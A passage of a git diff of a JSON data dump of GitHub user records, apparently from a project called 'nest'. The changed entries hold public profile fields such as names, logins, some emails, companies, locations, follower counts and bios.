"MDQ6VXNlcjk2NTkz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434378,49 +694302,49 @@ }, { "model": "github.user", - "pk": 2966, + "pk": 8336, "fields": { - "nest_created_at": "2024-09-12T02:39:46.134Z", - "nest_updated_at": "2024-09-12T02:39:46.134Z", - "name": "Wang \"LinG\" Lingxiang", - "login": "w93163red", - "email": "lingxiang.wang.2016@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/7308728?v=4", - "company": "Cloudflare", - "location": "Virginia, USA", + "nest_created_at": "2024-09-22T10:35:23.797Z", + "nest_updated_at": "2024-09-22T19:48:48.364Z", + "name": "Esa Jokinen", + "login": "oh2fih", + "email": "esa@esajokinen.net", + "avatar_url": "https://avatars.githubusercontent.com/u/58781154?v=4", + "company": "", + "location": "Finland", "collaborators_count": 0, - "following_count": 1, - "followers_count": 10, - "public_gists_count": 2, - "public_repositories_count": 70, - "created_at": "2014-04-16T00:56:27Z", - "updated_at": "2024-09-08T21:15:11Z", - "node_id": "MDQ6VXNlcjczMDg3Mjg=", + "following_count": 7, + "followers_count": 13, + "public_gists_count": 1, + "public_repositories_count": 12, + "created_at": "2019-12-11T15:11:28Z", + "updated_at": "2024-08-08T04:55:10Z", + "node_id": "MDQ6VXNlcjU4NzgxMTU0", "bio": "", - "is_hireable": true, + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2967, + "pk": 8337, "fields": { - "nest_created_at": "2024-09-12T02:39:48.596Z", - "nest_updated_at": "2024-09-12T02:39:48.596Z", + "nest_created_at": "2024-09-22T10:35:24.142Z", + "nest_updated_at": "2024-09-22T19:48:48.679Z", "name": "", - "login": "Meinolf-S", + "login": "EvgenyMarmal", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83540104?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/99873655?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2021-05-02T12:19:13Z", - "updated_at": "2022-08-02T09:01:10Z", - "node_id": "MDQ6VXNlcjgzNTQwMTA0", + "created_at": "2022-02-17T09:36:38Z", + "updated_at": "2022-02-19T12:02:00Z", + "node_id": "U_kgDOBfPzdw", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434428,24 +694352,24 @@ }, { "model": "github.user", - "pk": 2968, + "pk": 8338, "fields": { - "nest_created_at": "2024-09-12T02:39:53.151Z", - "nest_updated_at": "2024-09-12T02:39:53.151Z", - "name": "Bernd", - "login": "ecki", + "nest_created_at": "2024-09-22T10:35:24.450Z", + "nest_updated_at": "2024-09-22T19:48:49.018Z", + "name": "Finn Westendorf", + "login": "wfinn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/361432?v=4", - "company": "@seeburger-ag ", - "location": "Karlsruhe, Germany", + "avatar_url": "https://avatars.githubusercontent.com/u/42862612?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 8, - "followers_count": 51, - "public_gists_count": 27, - "public_repositories_count": 96, - "created_at": "2010-08-11T21:06:17Z", - "updated_at": "2024-09-05T11:24:41Z", - "node_id": "MDQ6VXNlcjM2MTQzMg==", + "following_count": 17, + "followers_count": 12, + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2018-08-31T08:43:42Z", + "updated_at": "2024-09-13T15:02:31Z", + "node_id": "MDQ6VXNlcjQyODYyNjEy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434453,24 +694377,24 @@ }, { "model": "github.user", - "pk": 2969, + "pk": 8339, "fields": { - "nest_created_at": "2024-09-12T02:39:53.954Z", - "nest_updated_at": "2024-09-12T02:39:53.954Z", - "name": "", - "login": "borramTAS", + "nest_created_at": "2024-09-22T10:35:24.759Z", + "nest_updated_at": "2024-09-22T19:48:49.331Z", + "name": "Glyn Mooney", + "login": "skidoosh", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/64269074?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/749058?v=4", "company": "", - "location": "", + "location": "North Wales", "collaborators_count": 0, "following_count": 6, - "followers_count": 1, + "followers_count": 3, "public_gists_count": 0, "public_repositories_count": 7, - "created_at": "2020-04-24T14:24:45Z", - "updated_at": "2024-01-21T13:51:42Z", - "node_id": "MDQ6VXNlcjY0MjY5MDc0", + "created_at": "2011-04-24T17:50:45Z", + "updated_at": "2024-09-20T07:50:53Z", + "node_id": "MDQ6VXNlcjc0OTA1OA==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434478,24 +694402,24 @@ }, { "model": "github.user", - "pk": 2970, + "pk": 8340, "fields": { - "nest_created_at": "2024-09-12T02:39:58.079Z", - "nest_updated_at": "2024-09-12T02:39:58.079Z", - "name": "Ruud de Jong", - "login": "ruud-de-jong", - "email": "ruud.dejong@visma.com", - "avatar_url": "https://avatars.githubusercontent.com/u/6389004?v=4", - "company": "Visma Connect", - "location": "The Hague, Netherlands", + "nest_created_at": "2024-09-22T10:35:25.410Z", + "nest_updated_at": "2024-09-22T19:48:49.983Z", + "name": "Jason Kim", + "login": "jaki", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16715704?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 5, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2014-01-13T11:35:12Z", - "updated_at": "2020-09-03T11:34:42Z", - "node_id": "MDQ6VXNlcjYzODkwMDQ=", + "public_repositories_count": 23, + "created_at": "2016-01-15T07:24:08Z", + "updated_at": "2024-08-11T00:53:38Z", + "node_id": "MDQ6VXNlcjE2NzE1NzA0", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434503,124 +694427,149 @@ }, { "model": "github.user", - "pk": 2971, + "pk": 8341, "fields": { - "nest_created_at": "2024-09-12T02:39:59.401Z", - "nest_updated_at": "2024-09-12T02:40:05.563Z", - "name": "", - "login": "nkavian", + "nest_created_at": "2024-09-22T10:35:25.738Z", + "nest_updated_at": "2024-09-22T19:48:50.299Z", + "name": "Jean-François Viguier", + "login": "jf-viguier", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1127421?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/16720275?v=4", + "company": "@Creabilis", + "location": "Toulouse / France", "collaborators_count": 0, - "following_count": 2, - "followers_count": 28, - "public_gists_count": 16, - "public_repositories_count": 73, - "created_at": "2011-10-14T03:22:11Z", - "updated_at": "2024-08-04T05:25:25Z", - "node_id": "MDQ6VXNlcjExMjc0MjE=", - "bio": "", + "following_count": 10, + "followers_count": 29, + "public_gists_count": 0, + "public_repositories_count": 55, + "created_at": "2016-01-15T13:50:32Z", + "updated_at": "2024-08-27T16:17:53Z", + "node_id": "MDQ6VXNlcjE2NzIwMjc1", + "bio": "e-commerce, dev, founder of Creabilis Agency", "is_hireable": false, - "twitter_username": "" + "twitter_username": "jfviguier" } }, { "model": "github.user", - "pk": 2972, + "pk": 8342, "fields": { - "nest_created_at": "2024-09-12T02:40:01.018Z", - "nest_updated_at": "2024-09-12T02:40:01.018Z", - "name": "", - "login": "drgrog", + "nest_created_at": "2024-09-22T10:35:26.388Z", + "nest_updated_at": "2024-09-22T19:48:50.964Z", + "name": "Krzysztof Kotowicz", + "login": "koto", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7420240?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/128171?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 1, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-04-27T13:09:40Z", - "updated_at": "2024-08-16T04:53:05Z", - "node_id": "MDQ6VXNlcjc0MjAyNDA=", + "following_count": 7, + "followers_count": 444, + "public_gists_count": 18, + "public_repositories_count": 115, + "created_at": "2009-09-17T15:11:16Z", + "updated_at": "2024-09-09T12:20:29Z", + "node_id": "MDQ6VXNlcjEyODE3MQ==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2973, + "pk": 8343, "fields": { - "nest_created_at": "2024-09-12T02:40:02.213Z", - "nest_updated_at": "2024-09-12T02:40:02.213Z", - "name": "Thomas BERNARD", - "login": "miniupnp", + "nest_created_at": "2024-09-22T10:35:26.707Z", + "nest_updated_at": "2024-09-22T19:48:51.273Z", + "name": "Matthias Kneer", + "login": "mat1010", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1070377?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/5108320?v=4", "company": "", - "location": "Paris", + "location": "Frankfurt a. M.", "collaborators_count": 0, - "following_count": 26, - "followers_count": 164, - "public_gists_count": 10, - "public_repositories_count": 70, - "created_at": "2011-09-22T08:24:37Z", - "updated_at": "2024-07-03T22:06:27Z", - "node_id": "MDQ6VXNlcjEwNzAzNzc=", - "bio": "some experience in network programming (BSD sockets and such)\r\nretrocomputing enthousiast.", + "following_count": 9, + "followers_count": 11, + "public_gists_count": 2, + "public_repositories_count": 44, + "created_at": "2013-07-28T19:45:29Z", + "updated_at": "2024-09-17T13:52:52Z", + "node_id": "MDQ6VXNlcjUxMDgzMjA=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2974, + "pk": 8344, "fields": { - "nest_created_at": "2024-09-12T02:40:03.459Z", - "nest_updated_at": "2024-09-12T02:40:03.460Z", - "name": "Thomas M. DuBuisson", - "login": "TomMD", - "email": "thomas.dubuisson@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/137806?v=4", - "company": "@paxosglobal", - "location": "Portland, USA", + "nest_created_at": "2024-09-22T10:35:27.024Z", + "nest_updated_at": "2024-09-22T19:48:51.593Z", + "name": "Mike Taylor", + "login": "miketaylr", + "email": "miketaylr@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/67283?v=4", + "company": "@googlechrome", + "location": "Belmont, MA", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 13, - "public_repositories_count": 56, - "created_at": "2009-10-10T06:54:10Z", - "updated_at": "2024-07-23T15:04:13Z", - "node_id": "MDQ6VXNlcjEzNzgwNg==", - "bio": "world = last $ iterate better now", + "following_count": 32, + "followers_count": 626, + "public_gists_count": 179, + "public_repositories_count": 212, + "created_at": "2009-03-26T02:48:22Z", + "updated_at": "2024-09-03T11:20:42Z", + "node_id": "MDQ6VXNlcjY3Mjgz", + "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "miketaylr" } }, { "model": "github.user", - "pk": 2975, + "pk": 8345, "fields": { - "nest_created_at": "2024-09-12T02:40:06.817Z", - "nest_updated_at": "2024-09-12T02:40:06.817Z", - "name": "Jason Copenhaver", - "login": "jcopenhop", + "nest_created_at": "2024-09-22T10:35:27.682Z", + "nest_updated_at": "2024-09-22T19:48:52.232Z", + "name": "Priyam Patel", + "login": "priyam001", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/104778402?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/42492530?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 1, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-05-02T14:46:43Z", - "updated_at": "2024-05-02T14:39:31Z", - "node_id": "U_kgDOBj7Kog", + "public_repositories_count": 10, + "created_at": "2018-08-18T11:31:00Z", + "updated_at": "2024-07-22T23:17:29Z", + "node_id": "MDQ6VXNlcjQyNDkyNTMw", + "bio": "Cyber Security enthusiast | Always Learning", + "is_hireable": false, + "twitter_username": "Priyam913" + } +}, +{ + "model": "github.user", + "pk": 8346, + "fields": { + "nest_created_at": "2024-09-22T10:35:28.011Z", + "nest_updated_at": "2024-09-22T19:48:52.559Z", + "name": "Scott O'Neil", + "login": "cPanelScott", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/1012951?v=4", + "company": "cPanel, Inc.", + "location": "Houston, TX", + "collaborators_count": 0, + "following_count": 0, + "followers_count": 8, + "public_gists_count": 2, + "public_repositories_count": 18, + "created_at": "2011-08-29T21:24:47Z", + "updated_at": "2020-05-07T17:04:46Z", + "node_id": "MDQ6VXNlcjEwMTI5NTE=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434628,24 +694577,24 @@ }, { "model": "github.user", - "pk": 2976, + "pk": 8347, "fields": { - "nest_created_at": "2024-09-12T02:40:08.074Z", - "nest_updated_at": "2024-09-12T02:40:08.074Z", - "name": "Jeeppler", - "login": "Jeeppler", + "nest_created_at": "2024-09-22T10:35:33.739Z", + "nest_updated_at": "2024-09-22T19:48:58.371Z", + "name": "Gabriel Saratura", + "login": "zugao", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/2007739?v=4", - "company": "", + "avatar_url": "https://avatars.githubusercontent.com/u/58511627?v=4", + "company": "@vshn", "location": "", "collaborators_count": 0, - "following_count": 57, - "followers_count": 25, - "public_gists_count": 11, - "public_repositories_count": 30, - "created_at": "2012-07-19T21:19:36Z", - "updated_at": "2024-06-07T10:23:57Z", - "node_id": "MDQ6VXNlcjIwMDc3Mzk=", + "following_count": 0, + "followers_count": 5, + "public_gists_count": 0, + "public_repositories_count": 9, + "created_at": "2019-12-04T10:43:05Z", + "updated_at": "2024-07-08T11:25:32Z", + "node_id": "MDQ6VXNlcjU4NTExNjI3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434653,49 +694602,49 @@ }, { "model": "github.user", - "pk": 2977, + "pk": 8348, "fields": { - "nest_created_at": "2024-09-12T02:40:09.321Z", - "nest_updated_at": "2024-09-12T02:40:09.321Z", - "name": "Basil Crow", - "login": "basil", + "nest_created_at": "2024-09-22T10:35:34.368Z", + "nest_updated_at": "2024-09-22T19:48:58.998Z", + "name": "Wolfgang Popp", + "login": "woefe", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29850?v=4", - "company": "@cloudbees", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/4680564?v=4", + "company": "", + "location": "~/", "collaborators_count": 0, - "following_count": 17, - "followers_count": 57, - "public_gists_count": 5, - "public_repositories_count": 514, - "created_at": "2008-10-19T22:48:52Z", - "updated_at": "2024-09-11T15:32:36Z", - "node_id": "MDQ6VXNlcjI5ODUw", + "following_count": 0, + "followers_count": 30, + "public_gists_count": 1, + "public_repositories_count": 26, + "created_at": "2013-06-12T15:21:56Z", + "updated_at": "2024-04-18T07:34:40Z", + "node_id": "MDQ6VXNlcjQ2ODA1NjQ=", "bio": "", "is_hireable": false, - "twitter_username": "bcrow" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2978, + "pk": 8349, "fields": { - "nest_created_at": "2024-09-12T02:40:13.458Z", - "nest_updated_at": "2024-09-12T02:40:13.458Z", - "name": "Delany", - "login": "delanym", + "nest_created_at": "2024-09-22T10:35:34.999Z", + "nest_updated_at": "2024-09-22T19:48:59.624Z", + "name": "Jeroen Boschman", + "login": "Boschman", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5310238?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1070905?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 15, - "followers_count": 9, + "following_count": 2, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 88, - "created_at": "2013-08-26T07:22:15Z", - "updated_at": "2024-09-07T11:21:10Z", - "node_id": "MDQ6VXNlcjUzMTAyMzg=", + "public_repositories_count": 20, + "created_at": "2011-09-22T12:39:17Z", + "updated_at": "2024-09-18T18:23:56Z", + "node_id": "MDQ6VXNlcjEwNzA5MDU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434703,49 +694652,49 @@ }, { "model": "github.user", - "pk": 2979, + "pk": 8350, "fields": { - "nest_created_at": "2024-09-12T02:40:14.297Z", - "nest_updated_at": "2024-09-12T02:40:14.297Z", - "name": "Andrew Johnson", - "login": "ajohnson1", + "nest_created_at": "2024-09-22T10:35:35.984Z", + "nest_updated_at": "2024-09-22T19:49:00.576Z", + "name": "Daminux", + "login": "daminuxfork", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7204163?v=4", - "company": "IBM United Kingdom Limited", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/95686504?v=4", + "company": "Negocian.Cloud", + "location": "Bordeaux, France", "collaborators_count": 0, - "following_count": 0, - "followers_count": 6, + "following_count": 1, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2014-04-07T11:48:17Z", - "updated_at": "2023-08-23T06:50:24Z", - "node_id": "MDQ6VXNlcjcyMDQxNjM=", - "bio": "", + "public_repositories_count": 11, + "created_at": "2021-12-07T10:34:19Z", + "updated_at": "2024-05-13T07:16:45Z", + "node_id": "U_kgDOBbQPaA", + "bio": "Founder/CEO @negociancloud\r\nFeel free to give us a shout!", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2980, + "pk": 8351, "fields": { - "nest_created_at": "2024-09-12T02:40:15.094Z", - "nest_updated_at": "2024-09-12T02:40:15.094Z", - "name": "", - "login": "whistlexie", + "nest_created_at": "2024-09-22T10:35:36.325Z", + "nest_updated_at": "2024-09-22T19:49:00.904Z", + "name": "Matias Davyt", + "login": "matias-at-skribble", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/10007354?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/86061962?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 18, - "created_at": "2014-11-30T06:53:31Z", - "updated_at": "2024-08-08T02:46:27Z", - "node_id": "MDQ6VXNlcjEwMDA3MzU0", + "public_repositories_count": 1, + "created_at": "2021-06-17T13:45:15Z", + "updated_at": "2024-08-28T13:15:50Z", + "node_id": "MDQ6VXNlcjg2MDYxOTYy", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434753,49 +694702,49 @@ }, { "model": "github.user", - "pk": 2981, + "pk": 8352, "fields": { - "nest_created_at": "2024-09-12T02:40:16.368Z", - "nest_updated_at": "2024-09-12T02:40:16.368Z", - "name": "Mr. Air Jan", - "login": "mrairjan", - "email": "airidas.janavicius@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/13693387?v=4", + "nest_created_at": "2024-09-22T10:35:36.634Z", + "nest_updated_at": "2024-09-22T19:49:01.213Z", + "name": "Sheldon", + "login": "sheldonchiu", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/32926567?v=4", "company": "", - "location": "", + "location": "Hong Kong", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 9, - "created_at": "2015-08-07T10:51:07Z", - "updated_at": "2024-09-03T10:18:14Z", - "node_id": "MDQ6VXNlcjEzNjkzMzg3", - "bio": "Software engineer", + "following_count": 2, + "followers_count": 9, + "public_gists_count": 4, + "public_repositories_count": 53, + "created_at": "2017-10-19T09:11:48Z", + "updated_at": "2024-09-01T15:12:32Z", + "node_id": "MDQ6VXNlcjMyOTI2NTY3", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2982, + "pk": 8353, "fields": { - "nest_created_at": "2024-09-12T02:40:17.191Z", - "nest_updated_at": "2024-09-12T02:40:18.392Z", - "name": "", - "login": "nchandrashekar79", + "nest_created_at": "2024-09-22T10:35:36.951Z", + "nest_updated_at": "2024-09-22T19:49:01.529Z", + "name": "Philipp Pfaff", + "login": "ppp0", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/83388759?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1888714?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 19, - "created_at": "2021-04-29T05:19:06Z", - "updated_at": "2024-04-20T14:35:36Z", - "node_id": "MDQ6VXNlcjgzMzg4NzU5", + "following_count": 1, + "followers_count": 7, + "public_gists_count": 20, + "public_repositories_count": 114, + "created_at": "2012-06-25T08:13:45Z", + "updated_at": "2024-08-12T07:17:56Z", + "node_id": "MDQ6VXNlcjE4ODg3MTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434803,74 +694752,74 @@ }, { "model": "github.user", - "pk": 2983, + "pk": 8354, "fields": { - "nest_created_at": "2024-09-12T02:40:20.410Z", - "nest_updated_at": "2024-09-12T02:40:20.410Z", - "name": "Antonio Petrelli", - "login": "apetrelli", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/966981?v=4", + "nest_created_at": "2024-09-22T10:35:37.264Z", + "nest_updated_at": "2024-09-22T19:49:01.837Z", + "name": "John Sommerville", + "login": "jsommerville-untangle", + "email": "jsommerville@arista.com", + "avatar_url": "https://avatars.githubusercontent.com/u/51130393?v=4", "company": "", - "location": "Rome, Italy", + "location": "", "collaborators_count": 0, - "following_count": 2, - "followers_count": 4, + "following_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 26, - "created_at": "2011-08-08T17:21:02Z", - "updated_at": "2024-06-11T10:20:17Z", - "node_id": "MDQ6VXNlcjk2Njk4MQ==", - "bio": "Mostly Java developer", + "public_repositories_count": 16, + "created_at": "2019-05-28T16:34:24Z", + "updated_at": "2024-04-25T19:30:47Z", + "node_id": "MDQ6VXNlcjUxMTMwMzkz", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2984, + "pk": 8355, "fields": { - "nest_created_at": "2024-09-12T02:40:22.083Z", - "nest_updated_at": "2024-09-12T02:40:22.083Z", - "name": "John P. Bindel", - "login": "jbindel", + "nest_created_at": "2024-09-22T10:35:37.582Z", + "nest_updated_at": "2024-09-22T19:49:02.158Z", + "name": "Jean-Kevin KPADEY", + "login": "mivek", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/5448121?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/9912558?v=4", "company": "", - "location": "Austin", + "location": "Paris", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 12, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2013-09-12T23:28:30Z", - "updated_at": "2024-02-08T16:15:58Z", - "node_id": "MDQ6VXNlcjU0NDgxMjE=", - "bio": "Software and product developer.", + "public_repositories_count": 23, + "created_at": "2014-11-23T09:50:09Z", + "updated_at": "2024-09-17T15:03:08Z", + "node_id": "MDQ6VXNlcjk5MTI1NTg=", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2985, + "pk": 8356, "fields": { - "nest_created_at": "2024-09-12T02:40:22.916Z", - "nest_updated_at": "2024-09-12T02:40:22.916Z", + "nest_created_at": "2024-09-22T10:35:37.890Z", + "nest_updated_at": "2024-09-22T19:49:02.474Z", "name": "", - "login": "azure247a", + "login": "vinceoa", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/144297648?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/78849858?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 1, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-09-07T02:02:48Z", - "updated_at": "2023-09-07T02:02:48Z", - "node_id": "U_kgDOCJnOsA", + "public_repositories_count": 16, + "created_at": "2021-02-10T09:55:47Z", + "updated_at": "2024-07-18T11:18:02Z", + "node_id": "MDQ6VXNlcjc4ODQ5ODU4", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434878,24 +694827,24 @@ }, { "model": "github.user", - "pk": 2986, + "pk": 8357, "fields": { - "nest_created_at": "2024-09-12T02:40:23.727Z", - "nest_updated_at": "2024-09-12T02:40:27.467Z", - "name": "", - "login": "soyodream", + "nest_created_at": "2024-09-22T10:35:38.521Z", + "nest_updated_at": "2024-09-22T19:49:03.124Z", + "name": "Weijian Li", + "login": "liweijian", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/151845313?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19320783?v=4", "company": "", - "location": "", + "location": "Guangzhou, China", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, + "following_count": 132, + "followers_count": 53, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2023-11-23T12:44:14Z", - "updated_at": "2023-11-23T14:39:38Z", - "node_id": "U_kgDOCQz5wQ", + "public_repositories_count": 3, + "created_at": "2016-05-12T06:34:23Z", + "updated_at": "2024-09-19T07:22:21Z", + "node_id": "MDQ6VXNlcjE5MzIwNzgz", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434903,24 +694852,24 @@ }, { "model": "github.user", - "pk": 2987, + "pk": 8358, "fields": { - "nest_created_at": "2024-09-12T02:40:29.895Z", - "nest_updated_at": "2024-09-12T02:40:31.521Z", - "name": "", - "login": "jim-bentler", + "nest_created_at": "2024-09-22T10:35:38.837Z", + "nest_updated_at": "2024-09-22T19:49:03.447Z", + "name": "Willem", + "login": "WterBerg", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/157437555?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1516925?v=4", "company": "", - "location": "", + "location": "Netherlands", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-01-23T01:32:52Z", - "updated_at": "2024-01-23T01:32:52Z", - "node_id": "U_kgDOCWJOcw", + "public_repositories_count": 5, + "created_at": "2012-03-08T16:40:58Z", + "updated_at": "2024-09-14T11:27:13Z", + "node_id": "MDQ6VXNlcjE1MTY5MjU=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434928,24 +694877,24 @@ }, { "model": "github.user", - "pk": 2988, + "pk": 8359, "fields": { - "nest_created_at": "2024-09-12T02:40:33.236Z", - "nest_updated_at": "2024-09-12T02:40:33.236Z", - "name": "", - "login": "pavelorehov", + "nest_created_at": "2024-09-22T10:35:39.165Z", + "nest_updated_at": "2024-09-22T19:49:03.766Z", + "name": "Wataru Sugiura", + "login": "flat35hd99", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/4618212?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/38929316?v=4", + "company": "Nagoya University", + "location": "Aichi", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2013-06-05T06:24:16Z", - "updated_at": "2024-02-04T11:36:41Z", - "node_id": "MDQ6VXNlcjQ2MTgyMTI=", + "following_count": 4, + "followers_count": 4, + "public_gists_count": 12, + "public_repositories_count": 173, + "created_at": "2018-05-03T01:06:06Z", + "updated_at": "2024-09-19T11:53:02Z", + "node_id": "MDQ6VXNlcjM4OTI5MzE2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434953,24 +694902,24 @@ }, { "model": "github.user", - "pk": 2989, + "pk": 8360, "fields": { - "nest_created_at": "2024-09-12T02:40:34.582Z", - "nest_updated_at": "2024-09-12T02:40:34.582Z", - "name": "", - "login": "haerter-tss", + "nest_created_at": "2024-09-22T10:35:39.484Z", + "nest_updated_at": "2024-09-22T19:49:04.079Z", + "name": "Vincent Ricard", + "login": "ghostd", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/98736006?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1098399?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 1, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2022-01-31T08:19:56Z", - "updated_at": "2024-09-11T13:39:41Z", - "node_id": "U_kgDOBeKXhg", + "public_repositories_count": 46, + "created_at": "2011-10-03T10:00:49Z", + "updated_at": "2024-05-03T08:26:35Z", + "node_id": "MDQ6VXNlcjEwOTgzOTk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -434978,49 +694927,124 @@ }, { "model": "github.user", - "pk": 2990, + "pk": 8361, "fields": { - "nest_created_at": "2024-09-12T02:40:35.404Z", - "nest_updated_at": "2024-09-12T02:40:35.404Z", - "name": "Slobodan Liric", - "login": "sliric", + "nest_created_at": "2024-09-22T10:35:40.151Z", + "nest_updated_at": "2024-09-22T19:49:04.705Z", + "name": "Stefan Pejcic", + "login": "stefanpejcic", + "email": "stefan@pejcic.rs", + "avatar_url": "https://avatars.githubusercontent.com/u/6408320?v=4", + "company": "NETOPS Group", + "location": "Belgrade, Serbia", + "collaborators_count": 0, + "following_count": 64, + "followers_count": 38, + "public_gists_count": 121, + "public_repositories_count": 194, + "created_at": "2014-01-15T10:14:57Z", + "updated_at": "2024-09-18T11:26:27Z", + "node_id": "MDQ6VXNlcjY0MDgzMjA=", + "bio": "I tell computers to do things.\r\nSometimes they listen.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8362, + "fields": { + "nest_created_at": "2024-09-22T10:35:40.494Z", + "nest_updated_at": "2024-09-22T19:49:05.021Z", + "name": "Rémy Peru", + "login": "kilbiller", + "email": "peru.remy@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/3019848?v=4", + "company": "@corpoevents", + "location": "France", + "collaborators_count": 0, + "following_count": 5, + "followers_count": 6, + "public_gists_count": 5, + "public_repositories_count": 28, + "created_at": "2012-12-11T21:43:36Z", + "updated_at": "2024-09-09T08:08:13Z", + "node_id": "MDQ6VXNlcjMwMTk4NDg=", + "bio": "Hi.", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 8363, + "fields": { + "nest_created_at": "2024-09-22T10:35:40.837Z", + "nest_updated_at": "2024-09-22T19:49:05.336Z", + "name": "Martin Helmich", + "login": "martin-helmich", "email": "", - "avatar_url": 